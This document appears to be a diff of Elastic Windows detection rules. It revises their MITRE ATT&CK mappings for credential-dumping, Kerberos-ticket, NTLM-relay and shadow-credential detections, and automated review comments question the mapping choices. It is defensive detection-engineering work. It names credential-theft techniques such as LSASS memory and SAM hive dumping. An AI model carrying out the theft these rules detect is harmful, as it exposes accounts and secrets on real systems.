@@ -100,19 +100,31 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/credential_access_moving_registry_hive_via_smb.toml b/rules/windows/credential_access_moving_registry_hive_via_smb.toml index 7dc0c02f2da..9c4ed0a37f3 100644 --- a/rules/windows/credential_access_moving_registry_hive_via_smb.toml +++ b/rules/windows/credential_access_moving_registry_hive_via_smb.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/16" integration = ["endpoint"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
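Review bot: The added Defense Evasion block (T1112 Modify Registry) changes which tactics the rule advertises, but `rule.tags` is not part of this hunk, so a `Tactic: Defense Evasion` tag is presumably still missing and should land in the same change. Given the hunk header shows a `registry where ... event.type in ("creation", "change")` query, T1112 itself is a reasonable fit.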
@@ -83,36 +83,49 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" reference = "https://attack.mitre.org/techniques/T1003/002/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/windows/credential_access_persistence_network_logon_provider_modification.toml b/rules/windows/credential_access_persistence_network_logon_provider_modification.toml index 3f82b5ebbed..a66e6cacb47 100644 --- a/rules/windows/credential_access_persistence_network_logon_provider_modification.toml +++ b/rules/windows/credential_access_persistence_network_logon_provider_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/18" integration = ["endpoint", "m365_defender", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
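Review bot: The new Exfiltration block (T1048 Exfiltration Over Alternative Protocol) looks like the wrong tactic for a `file where ... event.type == "creation"` rule that, per its file name, fires when a registry hive lands on a host over SMB. T1048 describes data leaving the environment over a non-C2 channel, whereas a hive copied between hosts on an admin share is closer to T1570 Lateral Tool Transfer or T1074 Data Staged, unless the detection is known to cover writes to external SMB targets. Suggest either dropping the TA0010 block or replacing the technique with `id = "T1074"` / `name = "Data Staged"` under Collection, and in either case adding the matching `Tactic:` tag in `rule.tags`, which this hunk does not touch.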
@@ -151,26 +151,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.008" +name = "Network Provider DLL" +reference = "https://attack.mitre.org/techniques/T1556/008/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/credential_access_posh_invoke_ninjacopy.toml b/rules/windows/credential_access_posh_invoke_ninjacopy.toml index 756fcb25eba..0713a1dcfe4 100644 --- a/rules/windows/credential_access_posh_invoke_ninjacopy.toml +++ b/rules/windows/credential_access_posh_invoke_ninjacopy.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/23" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -142,10 +142,12 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" 
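Review bot: The hunk refines T1556 to T1556.008 Network Provider DLL but leaves the Persistence block at the parent T1543 Create or Modify System Process. Network providers are registered under a provider's `Services` registry key, so if the `registry where ... event.type == "change"` path this rule watches is that key, adding `T1543.003` Windows Service would give the same precision as the T1556 refinement; if it is not, T1543 is itself a stretch and the Persistence claim deserves a sentence in `rule.note`. The query body is outside this hunk, so treat this as a consistency check.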
@@ -156,43 +158,51 @@ id = "T1003.003" name = "NTDS" reference = "https://attack.mitre.org/techniques/T1003/003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.004" +name = "LSA Secrets" +reference = "https://attack.mitre.org/techniques/T1003/004/" +[[rule.threat.technique.subtechnique]] +id = "T1003.005" +name = "Cached Domain Credentials" +reference = "https://attack.mitre.org/techniques/T1003/005/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1006" name = "Direct Volume Access" reference = "https://attack.mitre.org/techniques/T1006/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_kerb_ticket_dump.toml b/rules/windows/credential_access_posh_kerb_ticket_dump.toml index 8039fe58cfc..2050fa06d2e 100644 --- a/rules/windows/credential_access_posh_kerb_ticket_dump.toml +++ b/rules/windows/credential_access_posh_kerb_ticket_dump.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/26" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
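Review bot: The two new sub-technique tables (`T1003.004`, `T1003.005`) are inserted back-to-back directly after the `T1003.003` reference line, while the same hunk adds `+` blank lines between every other table; pick one layout so the TOML reads uniformly and later diffs stay minimal. Mapping-wise both sub-techniques are carried in the SECURITY hive that a raw-copy tool reads, so they are consistent with the existing SAM/NTDS entries. The enclosing `[[rule.threat]]` table starts before this hunk.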
@@ -126,40 +126,49 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.001" +name = "LSASS Memory" +reference = "https://attack.mitre.org/techniques/T1003/001/" + [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_relay_tools.toml b/rules/windows/credential_access_posh_relay_tools.toml index 87be03b98ba..22fae39b3d0 100644 --- a/rules/windows/credential_access_posh_relay_tools.toml +++ b/rules/windows/credential_access_posh_relay_tools.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/27" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
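Review bot: T1003.001 LSASS Memory is added alongside T1558 on a rule that, from its file name and the `event.category:process` query, targets PowerShell Kerberos ticket dumping; ticket retrieval typically goes through the LSA authentication-package APIs and does not read LSASS memory, so T1003.001 is only warranted if the pattern list also matches `sekurlsa`-style memory dumping, which is outside this hunk. T1106 Native API under Execution is plausible for P/Invoke-based scripts, but for the same reason should be tied to something the query actually matches. The new `T1106` table is also placed right after the `T1059.001` reference without the blank separator used elsewhere in this hunk.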
@@ -125,52 +125,57 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" +[[rule.threat.technique.subtechnique]] +id = "T1557.001" +name = "LLMNR/NBT-NS Poisoning and SMB Relay" +reference = "https://attack.mitre.org/techniques/T1557/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.002" name = "Pass the Hash" reference = "https://attack.mitre.org/techniques/T1550/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_veeam_sql.toml b/rules/windows/credential_access_posh_veeam_sql.toml index fa457a50f0f..320d82c2d40 100644 --- a/rules/windows/credential_access_posh_veeam_sql.toml +++ b/rules/windows/credential_access_posh_veeam_sql.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/14" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -140,6 +140,7 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" @@ -150,30 +151,41 @@ id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_rare_webdav_destination.toml b/rules/windows/credential_access_rare_webdav_destination.toml index 89cddbac06b..41ab73ef4d4 100644 --- a/rules/windows/credential_access_rare_webdav_destination.toml +++ b/rules/windows/credential_access_rare_webdav_destination.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/28" integration = ["endpoint", "system", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/01/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
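Review bot: The new Collection block maps T1213 Data from Information Repositories, whose sub-techniques cover knowledge bases, SharePoint, code and CRM systems; a backup server's credential database (the target implied by the file name and the existing T1555 mapping) is not an information repository in that sense. T1005 Data from Local System, or simply the existing T1555, would describe what the rule sees more accurately; if T1213 stays, add a sentence in `rule.note` justifying it. Whatever tactic is kept needs the matching `Tactic:` tag in `rule.tags`, which this hunk does not include.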
@@ -87,14 +87,31 @@ from logs-endpoint.events.process-*, logs-windows.sysmon_operational-*, logs-sys [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" reference = "https://attack.mitre.org/techniques/T1187/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/credential_access_regback_sam_security_hives.toml b/rules/windows/credential_access_regback_sam_security_hives.toml index 45500f46a21..711ea036359 100644 --- a/rules/windows/credential_access_regback_sam_security_hives.toml +++ b/rules/windows/credential_access_regback_sam_security_hives.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/01" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -79,10 +79,12 @@ file where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" @@ -93,7 +95,10 @@ id = "T1003.004" name = "LSA Secrets" reference = "https://attack.mitre.org/techniques/T1003/004/" - +[[rule.threat.technique.subtechnique]] +id = "T1003.005" +name = "Cached Domain Credentials" +reference = "https://attack.mitre.org/techniques/T1003/005/" [rule.threat.tactic] id = "TA0006" 
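Review bot: T1218.011 Rundll32 under Defense Evasion reads as an over-mapping for a WebDAV-destination rule: when a WebDAV path is opened, Windows itself spawns `rundll32.exe` with `davclnt.dll,DavSetCookie`, so the rundll32 execution the ES|QL query presumably keys on is OS behaviour rather than an adversary proxying execution through a signed binary. Unless the query also flags rundll32 launched with attacker-supplied arguments, consider keeping only T1187 Forced Authentication, or noting in `rule.note` that rundll32 is the vantage point rather than the technique. The query body is outside this hunk, and `Tactic: Defense Evasion` must be added to `rule.tags` if the block stays.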
diff --git a/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml b/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml index bb46707c121..0f9a4002862 100644 --- a/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml +++ b/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml @@ -2,7 +2,7 @@ creation_date = "2022/04/30" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,31 +100,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1187" +name = "Forced Authentication" +reference = "https://attack.mitre.org/techniques/T1187/" + [[rule.threat.technique]] id = "T1212" name = "Exploitation for Credential Access" reference = "https://attack.mitre.org/techniques/T1212/" +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/credential_access_shadow_credentials.toml b/rules/windows/credential_access_shadow_credentials.toml index f2acb0609bf..a3571a46176 100644 --- a/rules/windows/credential_access_shadow_credentials.toml +++ b/rules/windows/credential_access_shadow_credentials.toml 
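Review bot: T1557 Adversary-in-the-Middle is added to the Credential Access block at the parent level, while the sibling relay-tools rule in this series uses `T1557.001` LLMNR/NBT-NS Poisoning and SMB Relay. If this is the spoolss coercion rule the file name suggests, the SMB-relay sub-technique is an imperfect fit and the parent may be the deliberate choice; a short `rule.note` line saying so will stop the next mapping pass from "fixing" it. The `process where ... event.type == "start"` query these three techniques describe is outside the hunk.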
@@ -2,7 +2,7 @@ creation_date = "2022/01/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,14 +107,26 @@ event.code:"5136" and host.os.type:"windows" and winlog.event_data.AttributeLDAP [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_spn_attribute_modified.toml b/rules/windows/credential_access_spn_attribute_modified.toml index f7b5e02f1bd..676de53b1b4 100644 --- a/rules/windows/credential_access_spn_attribute_modified.toml +++ b/rules/windows/credential_access_spn_attribute_modified.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/22" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
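Review bot: T1098 Account Manipulation is added under Persistence only, yet for a shadow-credentials rule (the 5136 attribute filter is truncated in the hunk header, but presumably `msDS-KeyCredentialLink`) the write is at least as often a privilege-escalation step, since the attacker can then obtain a TGT as the target object. ATT&CK lists T1098 under both tactics, so consider a second `[[rule.threat]]` block with `id = "TA0004"` / `name = "Privilege Escalation"` carrying the same technique. The added tactic also needs its `Tactic: Persistence` tag in `rule.tags`, not visible here.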
@@ -106,19 +106,31 @@ event.code:5136 and host.os.type:"windows" and winlog.event_data.OperationType:" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [[rule.threat.technique.subtechnique]] id = "T1558.003" name = "Kerberoasting" reference = "https://attack.mitre.org/techniques/T1558/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_suspicious_comsvcs_imageload.toml b/rules/windows/credential_access_suspicious_comsvcs_imageload.toml index a1e9768b415..dc5054e536e 100644 --- a/rules/windows/credential_access_suspicious_comsvcs_imageload.toml +++ b/rules/windows/credential_access_suspicious_comsvcs_imageload.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/17" integration = ["windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
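Review bot: The new Persistence block (T1098 Account Manipulation) is a loose fit for a rule that, per its file name and the event 5136 `OperationType` filter in the hunk header, detects a servicePrincipalName write used to set up targeted Kerberoasting; the SPN is typically added and removed within minutes and provides no foothold, so "Persistence" overstates the intent. If the goal is to express that an account attribute was tampered with, T1098 under TA0004 Privilege Escalation matches the usual outcome better, or drop the second block and leave T1558.003 as the single mapping. Either choice should be mirrored in `rule.tags`, which this hunk does not modify.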
@@ -137,36 +137,46 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.003" +name = "Rename Legitimate Utilities" +reference = "https://attack.mitre.org/techniques/T1036/003/" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml b/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml index e63eabdab29..5fb6a32c581 100644 --- a/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml +++ b/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/16" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
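Review bot: T1036.003 Rename Legitimate Utilities is only supportable if the `sequence by process.entity_id` query compares the loading process's name against `process.pe.original_file_name` (a renamed rundll32 loading comsvcs.dll); the query is outside this hunk, so please verify that condition exists rather than mapping the sub-technique on the assumption that a suspicious image load implies renaming. If the rule also fires on a normally-named rundll32, T1036 should be dropped or `rule.note` should say which branch of the sequence the mapping refers to. The rest of the hunk only reflows blank lines.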
@@ -108,10 +108,12 @@ sequence by winlog.computer_name, winlog.event_data.SubjectLogonId with maxspan= [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" @@ -122,22 +124,25 @@ id = "T1003.004" name = "LSA Secrets" reference = "https://attack.mitre.org/techniques/T1003/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml b/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml index a019bfa0a69..b8650e2ef45 100644 --- a/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml +++ b/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/25" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] 
@@ -124,10 +124,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" @@ -138,10 +140,20 @@ id = "T1003.003" name = "NTDS" reference = "https://attack.mitre.org/techniques/T1003/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1006" +name = "Direct Volume Access" +reference = "https://attack.mitre.org/techniques/T1006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/credential_access_veeam_commands.toml b/rules/windows/credential_access_veeam_commands.toml index 26d95dd353c..2895e6e80bd 100644 --- a/rules/windows/credential_access_veeam_commands.toml +++ b/rules/windows/credential_access_veeam_commands.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/14" integration = ["windows", "endpoint", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,6 +94,7 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" 
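Review bot: The T1006 Direct Volume Access block added in the second hunk introduces a new tactic on a `process where ... event.type == "start"` rule, so `rule.tags` (outside this hunk) needs a `Tactic: Defense Evasion` entry to match. The mapping itself is defensible if, as the file name suggests, the rule catches a symbolic link to a shadow-copy device path, since that exposes the raw snapshot and sidesteps file locks on SAM/NTDS. The `credential_access_veeam_commands.toml` hunk at the end of this line only adds a blank line.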
@@ -104,26 +105,38 @@ id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/windows/credential_access_web_config_file_access.toml b/rules/windows/credential_access_web_config_file_access.toml index e8bd3d77a6c..e3ea0ffc993 100644 --- a/rules/windows/credential_access_web_config_file_access.toml +++ b/rules/windows/credential_access_web_config_file_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
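Review bot: Same concern as the PowerShell Veeam rule: T1213 Data from Information Repositories is scoped to SharePoint, Confluence, code and CRM repositories, not a backup server's credential store, so T1005 Data from Local System or the existing T1555 would be the more accurate Collection/Credential Access mapping. If T1213 is kept deliberately, a sentence in `rule.note` should say why, and `Tactic: Collection` must be added to `rule.tags`, which this hunk does not touch.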
